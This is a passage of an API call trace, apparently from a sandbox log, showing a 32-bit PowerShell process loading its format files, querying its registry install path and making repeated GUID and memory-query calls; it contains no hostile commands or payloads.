	[0160.756] GetLastError () returned 0x0
	[0160.756] SetErrorMode (uMode=0x1) returned 0x1
	[0160.756] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e0ca2c | out: lpFileInformation=0x2e0ca2c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0160.756] GetLastError () returned 0x0
	[0160.756] SetErrorMode (uMode=0x1) returned 0x1
	[0160.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.756] GetLastError () returned 0x0
	[0160.757] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce938 | out: phkResult=0xce938*=0x34c) returned 0x0
	[0160.757] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x0, lpcbData=0xce97c*=0x0 | out: lpType=0xce980*=0x1, lpData=0x0, lpcbData=0xce97c*=0x56) returned 0x0
	[0160.757] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x337c48, lpcbData=0xce97c*=0x56 | out: lpType=0xce980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce97c*=0x56) returned 0x0
	[0160.757] RegCloseKey (hKey=0x34c) returned 0x0
	[0160.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.757] GetLastError () returned 0x0
	[0160.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.757] GetLastError () returned 0x0
	[0160.758] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xbcce4e0e, Data2=0xa28c, Data3=0x4014, Data4=([0]=0xa6, [1]=0x29, [2]=0x9b, [3]=0xf6, [4]=0x40, [5]=0xc4, [6]=0x6b, [7]=0xb3))) returned 0x0
	[0160.773] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x61dfa1fa, Data2=0xd09b, Data3=0x4c9a, Data4=([0]=0xb1, [1]=0x75, [2]=0x65, [3]=0x9b, [4]=0xb7, [5]=0x70, [6]=0xb2, [7]=0x99))) returned 0x0
	[0160.774] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xc74f1666, Data2=0xc0bd, Data3=0x4ce5, Data4=([0]=0xad, [1]=0x3f, [2]=0xe, [3]=0x5d, [4]=0x38, [5]=0x7f, [6]=0x48, [7]=0x31))) returned 0x0
	[0160.774] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xf4bc6a82, Data2=0x330a, Data3=0x4e07, Data4=([0]=0x8d, [1]=0x0, [2]=0x39, [3]=0xd7, [4]=0x83, [5]=0x45, [6]=0xca, [7]=0x6))) returned 0x0
	[0160.774] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x9acf2ce7, Data2=0x539e, Data3=0x4b0e, Data4=([0]=0xb1, [1]=0x8, [2]=0xc, [3]=0x8b, [4]=0x45, [5]=0x58, [6]=0xfa, [7]=0xd7))) returned 0x0
	[0160.774] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xc7882e0e, Data2=0x8da7, Data3=0x44ea, Data4=([0]=0x8d, [1]=0x98, [2]=0xdb, [3]=0x2c, [4]=0x2d, [5]=0xff, [6]=0x68, [7]=0x60))) returned 0x0
	[0160.774] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.977] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x4fa55eb6, Data2=0x5a5f, Data3=0x4190, Data4=([0]=0xb0, [1]=0x4a, [2]=0xa1, [3]=0x5d, [4]=0x1f, [5]=0x98, [6]=0xfc, [7]=0x89))) returned 0x0
	[0160.977] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.977] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.978] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x78152ca9, Data2=0x2186, Data3=0x489e, Data4=([0]=0xb6, [1]=0x60, [2]=0x81, [3]=0xa, [4]=0x5, [5]=0x9b, [6]=0x9a, [7]=0x4e))) returned 0x0
	[0160.978] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x71bb44c2, Data2=0x7b48, Data3=0x48b2, Data4=([0]=0x94, [1]=0x14, [2]=0x3e, [3]=0x2a, [4]=0x67, [5]=0xee, [6]=0xc0, [7]=0x93))) returned 0x0
	[0160.978] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x8d549570, Data2=0xa26c, Data3=0x46cc, Data4=([0]=0x9d, [1]=0x67, [2]=0x3f, [3]=0xa4, [4]=0xd7, [5]=0xd1, [6]=0xbb, [7]=0xac))) returned 0x0
	[0160.978] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xa014eb44, Data2=0x1b1c, Data3=0x4daa, Data4=([0]=0xa6, [1]=0xc0, [2]=0x5c, [3]=0x4a, [4]=0x87, [5]=0xde, [6]=0x2f, [7]=0xe))) returned 0x0
	[0160.978] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.978] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xacaf1d1c, Data2=0x1c19, Data3=0x4b9c, Data4=([0]=0xb2, [1]=0x97, [2]=0x7c, [3]=0x9, [4]=0xfc, [5]=0xec, [6]=0xcc, [7]=0x9f))) returned 0x0
	[0160.978] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.979] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.979] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.979] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.979] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.980] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x300840f, Data2=0x9146, Data3=0x46a8, Data4=([0]=0x90, [1]=0xe, [2]=0xcd, [3]=0x8a, [4]=0x48, [5]=0xe1, [6]=0xc3, [7]=0x38))) returned 0x0
	[0160.980] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xb12acbbf, Data2=0xdc4a, Data3=0x46c3, Data4=([0]=0xb3, [1]=0x90, [2]=0x70, [3]=0x74, [4]=0x67, [5]=0x7c, [6]=0xc7, [7]=0xcf))) returned 0x0
	[0160.980] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xf3256c0, Data2=0x8f57, Data3=0x447e, Data4=([0]=0x82, [1]=0x3b, [2]=0x9a, [3]=0x2a, [4]=0x25, [5]=0xcc, [6]=0x31, [7]=0xf1))) returned 0x0
	[0160.980] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x785a85dc, Data2=0x5c97, Data3=0x442b, Data4=([0]=0xa6, [1]=0x41, [2]=0x6e, [3]=0xc1, [4]=0x7e, [5]=0x2f, [6]=0x83, [7]=0x92))) returned 0x0
	[0160.980] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xa88cf114, Data2=0x7079, Data3=0x4eaa, Data4=([0]=0xaa, [1]=0xbd, [2]=0x43, [3]=0x87, [4]=0xd7, [5]=0x50, [6]=0xac, [7]=0x1))) returned 0x0
	[0160.980] VirtualQuery (in: lpAddress=0xcd834, lpBuffer=0xce834, dwLength=0x1c | out: lpBuffer=0xce834*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.980] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xed0b9ce2, Data2=0x7aa, Data3=0x4003, Data4=([0]=0xaa, [1]=0x58, [2]=0xbe, [3]=0xdd, [4]=0xf3, [5]=0x81, [6]=0x46, [7]=0x58))) returned 0x0
	[0160.980] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x86675bb3, Data2=0x7bf1, Data3=0x45b8, Data4=([0]=0x95, [1]=0x31, [2]=0x13, [3]=0x2f, [4]=0x3d, [5]=0xba, [6]=0x7d, [7]=0xd4))) returned 0x0
	[0160.981] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x896b258c, Data2=0xc7a9, Data3=0x49cb, Data4=([0]=0xb4, [1]=0x82, [2]=0xe, [3]=0x4f, [4]=0x50, [5]=0x37, [6]=0xd4, [7]=0x9d))) returned 0x0
	[0160.981] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xb5199fa8, Data2=0x101d, Data3=0x41d6, Data4=([0]=0xb5, [1]=0x45, [2]=0x36, [3]=0x6f, [4]=0x56, [5]=0x23, [6]=0xd9, [7]=0x3c))) returned 0x0
	[0160.981] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xcdad4741, Data2=0xdb23, Data3=0x4f91, Data4=([0]=0xae, [1]=0x71, [2]=0x91, [3]=0xd4, [4]=0xc5, [5]=0xcd, [6]=0xb3, [7]=0x55))) returned 0x0
	[0160.981] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x40756abb, Data2=0x7d1, Data3=0x48f8, Data4=([0]=0xb3, [1]=0x6, [2]=0xfa, [3]=0x10, [4]=0xb1, [5]=0xa4, [6]=0x59, [7]=0x5d))) returned 0x0
	[0160.981] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x2308c8f6, Data2=0x9310, Data3=0x4e93, Data4=([0]=0x91, [1]=0x4d, [2]=0xd3, [3]=0x4d, [4]=0xee, [5]=0x52, [6]=0x1e, [7]=0x11))) returned 0x0
	[0160.981] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x26745c47, Data2=0x88cb, Data3=0x48e6, Data4=([0]=0x9d, [1]=0x3, [2]=0x7d, [3]=0x7, [4]=0xc3, [5]=0x2c, [6]=0x23, [7]=0x94))) returned 0x0
	[0160.981] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x7f625fbe, Data2=0x2abc, Data3=0x45f3, Data4=([0]=0x9d, [1]=0xe4, [2]=0x3b, [3]=0x19, [4]=0x38, [5]=0x27, [6]=0xac, [7]=0x30))) returned 0x0
	[0160.981] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x3300eafb, Data2=0x3bc8, Data3=0x40ff, Data4=([0]=0xbb, [1]=0xe4, [2]=0xf2, [3]=0x1a, [4]=0x52, [5]=0xff, [6]=0x32, [7]=0xf3))) returned 0x0
	[0160.981] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xda46cdb6, Data2=0x1dd0, Data3=0x4981, Data4=([0]=0xb7, [1]=0xfb, [2]=0xf7, [3]=0xb, [4]=0x86, [5]=0xae, [6]=0x96, [7]=0xe8))) returned 0x0
	[0160.982] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x7253188c, Data2=0xcf6d, Data3=0x4a7d, Data4=([0]=0xae, [1]=0xb9, [2]=0xb6, [3]=0x73, [4]=0x41, [5]=0x7b, [6]=0x54, [7]=0xc2))) returned 0x0
	[0160.982] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xedaf3b75, Data2=0xeeaf, Data3=0x408c, Data4=([0]=0xab, [1]=0xfa, [2]=0xc5, [3]=0x3b, [4]=0x4c, [5]=0x33, [6]=0x5e, [7]=0xe6))) returned 0x0
	[0160.982] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x8da85e12, Data2=0x8a23, Data3=0x4e37, Data4=([0]=0xa5, [1]=0x4, [2]=0x76, [3]=0x11, [4]=0xca, [5]=0x1a, [6]=0xd2, [7]=0x7))) returned 0x0
	[0160.982] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xf705ef5d, Data2=0x6e6f, Data3=0x40af, Data4=([0]=0xa4, [1]=0x6f, [2]=0xf7, [3]=0x9c, [4]=0x89, [5]=0x4a, [6]=0x46, [7]=0x7a))) returned 0x0
	[0160.982] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x99a98771, Data2=0xb010, Data3=0x4ade, Data4=([0]=0xb0, [1]=0xee, [2]=0xcb, [3]=0x38, [4]=0xd6, [5]=0x5f, [6]=0xf6, [7]=0x47))) returned 0x0
	[0160.982] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xd87b4db4, Data2=0xc917, Data3=0x4aa7, Data4=([0]=0xa3, [1]=0xbb, [2]=0x89, [3]=0xd0, [4]=0x14, [5]=0xb3, [6]=0xb9, [7]=0x30))) returned 0x0
	[0160.982] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x1a6131b9, Data2=0xb307, Data3=0x4b57, Data4=([0]=0xa2, [1]=0xde, [2]=0xf0, [3]=0x8b, [4]=0xfe, [5]=0x6c, [6]=0x78, [7]=0x15))) returned 0x0
	[0160.982] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xbcda74c5, Data2=0xd07c, Data3=0x4571, Data4=([0]=0x8e, [1]=0xaa, [2]=0x38, [3]=0xb4, [4]=0x72, [5]=0xac, [6]=0xe0, [7]=0x48))) returned 0x0
	[0160.982] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.983] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.984] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.986] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xd06efa88, Data2=0x732, Data3=0x4464, Data4=([0]=0xa6, [1]=0x38, [2]=0x73, [3]=0xc4, [4]=0xf8, [5]=0x41, [6]=0xad, [7]=0x10))) returned 0x0
	[0160.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.986] GetLastError () returned 0x0
	[0160.986] SetErrorMode (uMode=0x1) returned 0x1
	[0160.986] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0160.986] GetLastError () returned 0x0
	[0160.986] GetFileType (hFile=0x34c) returned 0x1
	[0160.986] SetErrorMode (uMode=0x1) returned 0x1
	[0160.986] GetFileType (hFile=0x34c) returned 0x1
	[0160.987] ReadFile (in: hFile=0x34c, lpBuffer=0x2ea9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea9918*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.987] GetLastError () returned 0x0
	[0160.987] ReadFile (in: hFile=0x34c, lpBuffer=0x2ea9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea9918*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.987] GetLastError () returned 0x0
	[0160.987] ReadFile (in: hFile=0x34c, lpBuffer=0x2ea9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea9918*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.987] GetLastError () returned 0x0
	[0160.987] ReadFile (in: hFile=0x34c, lpBuffer=0x2ea9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea9918*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.987] GetLastError () returned 0x0
	[0160.987] ReadFile (in: hFile=0x34c, lpBuffer=0x2ea9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea9918*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.987] GetLastError () returned 0x0
	[0160.987] ReadFile (in: hFile=0x34c, lpBuffer=0x2ea9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea9918*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.987] GetLastError () returned 0x0
	[0160.987] ReadFile (in: hFile=0x34c, lpBuffer=0x2ea9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea9918*, lpNumberOfBytesRead=0xce9b4*=0x119, lpOverlapped=0x0) returned 1
	[0160.987] GetLastError () returned 0x0
	[0160.988] ReadFile (in: hFile=0x34c, lpBuffer=0x2ea9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea9918*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0160.988] GetLastError () returned 0x0
	[0160.988] CloseHandle (hObject=0x34c) returned 1
	[0160.988] GetLastError () returned 0x0
	[0160.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.988] GetLastError () returned 0x0
	[0160.988] SetErrorMode (uMode=0x1) returned 0x1
	[0160.988] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2eca914 | out: lpFileInformation=0x2eca914*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0160.988] GetLastError () returned 0x0
	[0160.988] SetErrorMode (uMode=0x1) returned 0x1
	[0160.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.988] GetLastError () returned 0x0
	[0160.988] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce938 | out: phkResult=0xce938*=0x34c) returned 0x0
	[0160.989] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x0, lpcbData=0xce97c*=0x0 | out: lpType=0xce980*=0x1, lpData=0x0, lpcbData=0xce97c*=0x56) returned 0x0
	[0160.989] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x337c48, lpcbData=0xce97c*=0x56 | out: lpType=0xce980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce97c*=0x56) returned 0x0
	[0160.989] RegCloseKey (hKey=0x34c) returned 0x0
	[0160.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.989] GetLastError () returned 0x0
	[0160.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.989] GetLastError () returned 0x0
	[0160.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.990] GetLastError () returned 0x0
	[0160.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.990] GetLastError () returned 0x0
	[0160.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.990] GetLastError () returned 0x0
	[0160.990] VirtualQuery (in: lpAddress=0xcd690, lpBuffer=0xce690, dwLength=0x1c | out: lpBuffer=0xce690*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.990] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x1f949f22, Data2=0x8772, Data3=0x4719, Data4=([0]=0x89, [1]=0xc7, [2]=0xee, [3]=0xc0, [4]=0xf7, [5]=0xe5, [6]=0x83, [7]=0x1))) returned 0x0
	[0160.990] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.991] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x146fd005, Data2=0xf0e2, Data3=0x4cdf, Data4=([0]=0xb8, [1]=0xb9, [2]=0x7d, [3]=0x6d, [4]=0xbb, [5]=0xfd, [6]=0x54, [7]=0x93))) returned 0x0
	[0160.991] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x4ade129e, Data2=0xda22, Data3=0x4014, Data4=([0]=0x9f, [1]=0x97, [2]=0x0, [3]=0x78, [4]=0xb9, [5]=0xb3, [6]=0x93, [7]=0xcf))) returned 0x0
	[0160.991] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xdb82fa47, Data2=0x5c36, Data3=0x4bdb, Data4=([0]=0x8e, [1]=0xf0, [2]=0xea, [3]=0x76, [4]=0x9f, [5]=0x6e, [6]=0xa3, [7]=0xbf))) returned 0x0
	[0160.991] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.991] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
